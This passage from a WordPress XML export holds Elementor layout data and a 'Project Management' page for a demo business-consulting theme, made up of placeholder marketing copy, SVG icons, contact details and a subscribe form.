you move forward at speed despite enormous uncertainty? Radar Strategy provides the answer. Our unique \"Today Forward, Future Back\" approach enables you to create value now as you move toward your future vision, with the flexibility to adapt as scenarios change. We\u2019ll help you make critical choices and choreograph your transformation journey as you bring your core to full potential and build new growth engines.<\/p><p>Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks: an outside-in approach that puts customers first, a uniquely great customer experience and internal capabilities that ensure you deliver optimal customer interactions at every touchpoint.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"e91e771","elType":"section","settings":{"layout":"full_width","gap":"extended","structure":"20","padding":{"unit":"px","top":"0","right":"0","bottom":"65","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[{"id":"122c65b","elType":"column","settings":{"_column_size":50,"_inline_size":null,"margin":{"unit":"px","top":"0","right":"50","bottom":"0","left":"0","isLinked":false},"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[{"id":"7bddef1","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/business-and-finance.svg","id":1407},"library":"svg"},"title":"Financial Services","des":"We help financial institutions, from banking and insurance to wealth.","_padding":{"unit":"px","top":"0","right":"0","bottom":"35","left":"0","isLinked":false}},"elements":[],"widgetType":"iiconbox2"},{"id":"522b33e","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/business-and-finance-1.svg","id":1408},"library":"svg"},"title":"Government Services","des":"We help financial institutions, from banking and insurance to wealth."},"elements":[],"widgetType":"iiconbox2"}],"isInner":true},{"id":"e34cba3","elType":"column","settings":{"_column_size":50,"_inline_size":null,"margin":{"unit":"px","top":"0","right":"50","bottom":"0","left":"0","isLinked":false},"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"8022263","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/holidays.svg","id":1410},"library":"svg"},"title":"Financial Services","des":"We help financial institutions, from banking and insurance to wealth.","icon_size":{"unit":"px","size":46,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"35","left":"0","isLinked":false}},"elements":[],"widgetType":"iiconbox2"},{"id":"8ba35e7","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/energy.svg","id":980},"library":"svg"},"title":"Natural Resources","des":"We help financial institutions, from banking and insurance to wealth."},"elements":[],"widgetType":"iiconbox2"}],"isInner":true}],"isInner":true},{"id":"ce7cc23","elType":"section","settings":{"layout":"full_width","structure":"20","background_background":"classic","background_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/bg1-service-detail3.jpg","id":982},"background_position":"center center","background_repeat":"no-repeat","background_size":"cover","border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"margin":{"unit":"px","top":"0","right":0,"bottom":"65","left":0,"isLinked":false},"padding":{"unit":"px","top":"70","right":"0","bottom":"70","left":"100","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"30","isLinked":false}},"elements":[{"id":"e61a616","elType":"column","settings":{"_column_size":50,"_inline_size":45.695999999999997953636921010911464691162109375,"_inline_size_tablet":80},"elements":[{"id":"4c16558","elType":"widget","settings":{"title":"how we help","header_size":"h6","title_color":"#FFFFFF","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":14,"sizes":[]},"typography_font_weight":"bold","typography_text_transform":"uppercase","_padding":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"65dee06","elType":"widget","settings":{"title":"Align Costs with Strategy & Focus on Growth","header_size":"h3","title_color":"#FFFFFF","_padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"7ab0f67","elType":"widget","settings":{"btn_style":"light","text":"get in touch","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/contacts\/","is_external":"","nofollow":"","custom_attributes":""}},"elements":[],"widgetType":"ibutton"}],"isInner":true},{"id":"abd3090","elType":"column","settings":{"_column_size":50,"_inline_size":54.304000000000002046363078989088535308837890625},"elements":[],"isInner":true}],"isInner":true},{"id":"29089d9","elType":"section","settings":{"layout":"full_width","gap":"extended","content_position":"bottom","structure":"20","padding":{"unit":"px","top":"0","right":"0","bottom":"65","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[{"id":"e0d31db","elType":"column","settings":{"_column_size":50,"_inline_size":46,"margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[{"id":"c0c4b49","elType":"widget","settings":{"title":"How It Works & How We Do It","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"1507a17","elType":"widget","settings":{"editor":"<p>We are working in the format of an outsourcing project office. We assume operational coordination and control over the compliance with all project implementation parameters that ensures the execution of works on time.<\/p><p>Integrating of innovation and public benefit into your workflows; ensuring strategic and sustainable development of your organization from project.<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"6bfd814","elType":"column","settings":{"_column_size":50,"_inline_size":54},"elements":[{"id":"ad31a08","elType":"widget","settings":{"title":"marketing analysis","percent":{"unit":"%","size":60,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"18","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"iprogress"},{"id":"2ef81ea","elType":"widget","settings":{"title":"finance strategy","percent":{"unit":"%","size":80,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"18","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"iprogress"},{"id":"d8149bc","elType":"widget","settings":{"title":"business innovation","percent":{"unit":"%","size":58,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"18","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"iprogress"},{"id":"97cbbb6","elType":"widget","settings":{"title":"CORPORATE MANAGEMENT","_padding":{"unit":"px","top":"0","right":"0","bottom":"18","left":"0","isLinked":false}},"elements":[],"widgetType":"iprogress"}],"isInner":true}],"isInner":true},{"id":"206ff31","elType":"section","settings":{"gap":"extended","background_background":"classic","background_color":"#F5F5F5","border_radius":{"unit":"px","top":"10","right":"10","bottom":"10","left":"10","isLinked":true},"margin":{"unit":"px","top":"0","right":0,"bottom":"65","left":0,"isLinked":false},"margin_mobile":{"unit":"px","top":"0","right":0,"bottom":"50","left":0,"isLinked":false},"padding":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"187c777","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"15a4ea5","elType":"widget","settings":{"editor":"<blockquote>\u201cI cannot give you the formula for success, but I can give you the \nformula for failure. It is: Try to please everybody.\u201d\n<cite>david oswald<\/cite><\/blockquote>","_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"_padding":{"unit":"px","top":"0","right":"90","bottom":"0","left":"90","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"15","bottom":"0","left":"15","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true},{"id":"ec27098","elType":"widget","settings":{"title":"Business Planning & Strategy","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"35","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"8eca34c","elType":"widget","settings":{"ot_accs":[{"acc_title":"In what areas do you provide management consulting?","acc_content":"<p>Successful experience of experts in structuring investment projects, developing and implementing construction, developers and energy projects, restructuring programs, etc. provides a positive impact on your company profitability.<\/p>","_id":"75ae542"},{"acc_title":"In which countries do you provide consulting services?","acc_content":"<p>Successful experience of experts in structuring investment projects, developing and implementing construction, developers and energy projects, restructuring programs, etc. provides a positive impact on your company profitability.<\/p>","_id":"a85daa6"},{"acc_title":"How is a consulting project started and organized?","acc_content":"<p>Successful experience of experts in structuring investment projects, developing and implementing construction, developers and energy projects, restructuring programs, etc. provides a positive impact on your company profitability.<\/p>","_id":"8e79519"}]},"elements":[],"widgetType":"iaccordions"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:11:{s:7:"heading";a:3:{s:5:"count";i:7;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:7;s:11:"header_size";i:7;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:8:"_padding";i:5;s:15:"_padding_mobile";i:1;}}s:5:"style";a:1:{s:19:"section_title_style";a:6:{s:11:"title_color";i:2;s:21:"typography_typography";i:1;s:22:"typography_font_family";i:1;s:20:"typography_font_size";i:1;s:22:"typography_font_weight";i:1;s:25:"typography_text_transform";i:1;}}}}s:7:"divider";a:3:{s:5:"count";i:4;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:5:"style";a:1:{s:21:"section_divider_style";a:3:{s:5:"color";i:4;s:3:"gap";i:4;s:6:"weight";i:2;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:12:"_css_classes";i:2;s:7:"_margin";i:2;}}}}s:6:"column";a:3:{s:5:"count";i:13;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:6:"layout";a:1:{s:6:"layout";a:3:{s:12:"_inline_size";i:13;s:19:"_inline_size_mobile";i:4;s:19:"_inline_size_tablet";i:3;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:3:{s:13:"margin_tablet";i:3;s:6:"margin";i:2;s:13:"margin_mobile";i:2;}}}}s:7:"section";a:3:{s:5:"count";i:7;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:3:{s:6:"layout";i:5;s:3:"gap";i:6;s:16:"content_position";i:1;}s:17:"section_structure";a:1:{s:9:"structure";i:6;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:4:{s:7:"padding";i:5;s:14:"padding_mobile";i:4;s:6:"margin";i:2;s:13:"margin_mobile";i:1;}}s:5:"style";a:2:{s:18:"section_background";a:6:{s:21:"background_background";i:2;s:16:"background_image";i:1;s:19:"background_position";i:1;s:17:"background_repeat";i:1;s:15:"background_size";i:1;s:16:"background_color";i:1;}s:14:"section_border";a:1:{s:13:"border_radius";i:2;}}}}s:9:"icon-list";a:3:{s:5:"count";i:1;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:1:{s:9:"icon_list";i:1;}}s:5:"style";a:3:{s:17:"section_icon_list";a:1:{s:13:"space_between";i:1;}s:18:"section_icon_style";a:2:{s:10:"icon_color";i:1;s:9:"icon_size";i:1;}s:18:"section_text_style";a:8:{s:10:"text_color";i:1;s:16:"text_color_hover";i:1;s:11:"text_indent";i:1;s:26:"icon_typography_typography";i:1;s:27:"icon_typography_font_family";i:1;s:25:"icon_typography_font_size";i:1;s:27:"icon_typography_font_weight";i:1;s:30:"icon_typography_text_transform";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:5:"image";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:13:"section_image";a:5:{s:5:"image";i:1;s:10:"image_size";i:1;s:5:"align";i:1;s:7:"link_to";i:1;s:4:"link";i:1;}}s:5:"style";a:1:{s:19:"section_style_image";a:1:{s:19:"image_border_radius";i:1;}}}}s:11:"text-editor";a:3:{s:5:"count";i:3;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:14:"section_editor";a:1:{s:6:"editor";i:3;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:8:"_padding";i:2;s:15:"_padding_mobile";i:2;s:7:"_margin";i:1;}}}}s:9:"iiconbox2";a:3:{s:5:"count";i:4;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:3:{s:9:"icon_font";i:4;s:5:"title";i:4;s:3:"des";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:2;}}s:5:"style";a:1:{s:18:"style_icon_section";a:1:{s:9:"icon_size";i:1;}}}}s:7:"ibutton";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:7:"content";a:1:{s:14:"button_section";a:3:{s:9:"btn_style";i:1;s:4:"text";i:1;s:4:"link";i:1;}}}}s:9:"iprogress";a:3:{s:5:"count";i:4;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"content_section";a:2:{s:5:"title";i:4;s:7:"percent";i:3;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:8:"_padding";i:4;s:15:"_padding_tablet";i:3;}}}}s:11:"iaccordions";a:3:{s:5:"count";i:1;s:15:"control_percent";i:0;s:8:"controls";a:1:{s:7:"content";a:1:{s:15:"content_section";a:1:{s:7:"ot_accs";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Project Management</title>
		<link>http://wpdemo.archiwp.com/maxbizz/our-services/project-management/</link>
		<pubDate>Tue, 22 Sep 2020 02:52:23 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?page_id=996</guid>
		<description></description>
		<content:encoded><![CDATA[<img width="870" height="576" src="https://maxbizz.s3.amazonaws.com/images/service-box4.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/service-box4.jpg 870w, https://maxbizz.s3.amazonaws.com/images/service-box4-300x199.jpg 300w, https://maxbizz.s3.amazonaws.com/images/service-box4-768x508.jpg 768w" sizes="(max-width: 870px) 100vw, 870px">
<h3>We Conduct Marketing Research</h3>
It’s a daunting challenge: How do you move forward at speed despite enormous uncertainty? Radar Strategy provides the answer. Our unique "Today Forward, Future Back" approach enables you to create value now as you move toward your future vision, with the flexibility to adapt as scenarios change. We’ll help you make critical choices and choreograph your transformation journey as you bring your core to full potential and build new growth engines.

Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks: an outside-in approach that puts customers first, a uniquely great customer experience and internal capabilities that ensure you deliver optimal customer interactions at every touchpoint.

75
<h6>marketing analysis</h6>
65
<h6>business innovation</h6>
90
<h6>finance strategy</h6>
<h3>We are Always Ready to Assist Our Clients</h3>
developing financial processes and procedures
<h5>How It Works &amp; How We Do It</h5>
Our specialists are ready to provide an analysis of both the market as a whole and its individual components (competitors, consumers, product, etc.), using practical methods and starting from your research goals.
<ul>
 	<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

the organization is just beginning to operate in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.</li>
 	<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

there are projects that require temporary expansion of the marketing department. Customer-focused businesses build a virtuous cycle we call the "customer wheel." We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.</li>
 	<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

there are projects that require temporary expansion of the marketing department. Align your marketing  and brand strategy with overarching business objectives. We help you combine hard metrics with creative.</li>
</ul>
<blockquote>“I cannot give you the formula for success, but I can give you the
formula for failure. It is: Try to please everybody.”
<cite>david oswald</cite></blockquote>
<h5>Business Planning &amp; Strategy</h5>
<img width="466" height="296" src="https://maxbizz.s3.amazonaws.com/images/chart1-service.png" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/chart1-service.png 466w, https://maxbizz.s3.amazonaws.com/images/chart1-service-300x191.png 300w" sizes="(max-width: 466px) 100vw, 466px">

Nurture promoters, your loyal customers who are more profitable and will advocate for your business—both in good times and bad.

Customer-focused businesses build a virtuous cycle we call the "customer wheel." We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization. Identify quick, targeted customized solutions and operational improvements.
<h6>Services</h6>
<ul>
 	<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/marketing-research">
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

marketing research
</a></li>
 	<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/our-services/organizational-audit/">
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

Organizational Audit
</a></li>
 	<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/business-consulting">
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

business consulting
</a></li>
 	<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/our-services/project-management/">
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

project management
</a></li>
 	<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/our-services/support-function/">
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

support functions
</a></li>
 	<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/our-services/finance-planning/">
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

finance planning
</a></li>
</ul>
<h6>Contacts</h6>
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve"></svg>
<g>
<g>
		<path d="M256,0C150.125,0,64,86.135,64,192c0,141.646,177.146,310,184.688,317.104C250.75,511.031,253.375,512,256,512    s5.25-0.969,7.313-2.896C270.854,502,448,333.646,448,192C448,86.135,361.875,0,256,0z M256,298.667    c-58.813,0-106.667-47.854-106.667-106.667S197.188,85.333,256,85.333S362.667,133.188,362.667,192S314.813,298.667,256,298.667z"></path>
	</g>
</g>
<h6>
					Visit Us Daily</h6>
411 University St, Seattle

<a href="tel:+1-800-456-478-23">
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" viewBox="0 0 384 384" style="enable-background:new 0 0 384 384;" xml:space="preserve"></svg>
<g>
<g>
		<path d="M353.188,252.052c-23.51,0-46.594-3.677-68.469-10.906c-10.719-3.656-23.896-0.302-30.438,6.417l-43.177,32.594    c-50.073-26.729-80.917-57.563-107.281-107.26l31.635-42.052c8.219-8.208,11.167-20.198,7.635-31.448    c-7.26-21.99-10.948-45.063-10.948-68.583C132.146,13.823,118.323,0,101.333,0H30.813C13.823,0,0,13.823,0,30.813    C0,225.563,158.438,384,353.188,384c16.99,0,30.813-13.823,30.813-30.813v-70.323C384,265.875,370.177,252.052,353.188,252.052z"></path>
	</g>
</g>
</a>
<h6>
					<a href="tel:+1-800-456-478-23">Have Any Questions?</a></h6>
+1-800-456-478-23

<a href="mailto:maxbizz@mail.com">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="m8.75 17.612v4.638c0 .324.208.611.516.713.077.025.156.037.234.037.234 0 .46-.11.604-.306l2.713-3.692z"></path><path d="m23.685.139c-.23-.163-.532-.185-.782-.054l-22.5 11.75c-.266.139-.423.423-.401.722.023.3.222.556.505.653l6.255 2.138 13.321-11.39-10.308 12.419 10.483 3.583c.078.026.16.04.242.04.136 0 .271-.037.39-.109.19-.116.319-.311.352-.53l2.75-18.5c.041-.28-.077-.558-.307-.722z"></path></svg>				</a>
<h6>
					<a href="mailto:maxbizz@mail.com">Mail Us</a></h6>
maxbizz@mail.com

<a href="#">
<img width="270" height="90" src="https://maxbizz.s3.amazonaws.com/images/img-btn-pdf.jpg" alt="" loading="lazy">								</a>
<h4>Ready to Get Started?</h4>
<p role="status" aria-live="polite" aria-atomic="true"></p>

<ul></ul>
<form action="/maxbizz/wp-admin/admin-ajax.php#wpcf7-f741-o1" method="post" novalidate="novalidate" data-status="init">
<input type="hidden" name="_wpcf7" value="741">
<input type="hidden" name="_wpcf7_version" value="5.3">
<input type="hidden" name="_wpcf7_locale" value="en_US">
<input type="hidden" name="_wpcf7_unit_tag" value="wpcf7-f741-o1">
<input type="hidden" name="_wpcf7_container_post" value="0">
<input type="hidden" name="_wpcf7_posted_data_hash" value="">
<input type="text" name="your-name" value="" size="40" aria-required="true" aria-invalid="false" placeholder="Your Name *">
<input type="email" name="your-email" value="" size="40" aria-required="true" aria-invalid="false" placeholder="Your Email *">
<button type="submit">Subscribe Now</button>
</form>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>996</wp:post_id>
		<wp:post_date><![CDATA[2020-09-22 02:52:23]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-22 02:52:23]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[project-management]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>868</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[page]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[page_layout]]></wp:meta_key>
		<wp:meta_value><![CDATA[full-content]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[is_trans]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[#ffffff]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-page]]></wp:meta_value>
